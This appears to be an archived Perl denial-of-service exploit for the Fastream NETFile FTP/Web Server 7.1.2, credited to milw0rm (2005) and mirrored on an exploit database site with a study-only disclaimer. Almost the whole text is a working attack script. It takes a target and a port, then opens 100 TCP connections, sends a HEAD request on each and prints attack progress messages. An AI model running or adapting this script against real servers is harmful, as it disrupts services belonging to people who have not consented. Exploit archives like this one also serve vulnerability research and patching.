#Fastream NETFile FTP/Web Server 7.1.2 Professional DoS Exploit #Bug found by bratax ck #Coded bY karak0rsan #d0gma.org // unuver.com #Greetz:hurby,phalaposher,l4m3r,Atak,spymaster,razor... $host=$ARGV[0]; $port=$ARGV[1]; if(!$ARGV[1]){ print "Fastream FTP/Web Server DoS\n"; print "Coded by karak0rsan // unuver.com\n"; print "Usage:perl $0 [target] [port]\n"; } use IO::Socket; $socket = new IO::Socket::INET( PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Type => SOCK_STREAM, ) or die "Couldn't Connect!\n";; close($socket); if($socket){ print "\n"; print "[+]Attacking..!\n"; } for($i= 0; $i < 100; $i++) { $socket1 = new IO::Socket::INET( PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Type => SOCK_STREAM, ); print $socket1 "HEAD / HTTP/1.0\r\n\r\n"; close($socket1); } print "Attack finished ;)\n"; exit(); #EoF # milw0rm.com [2005-09-16]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论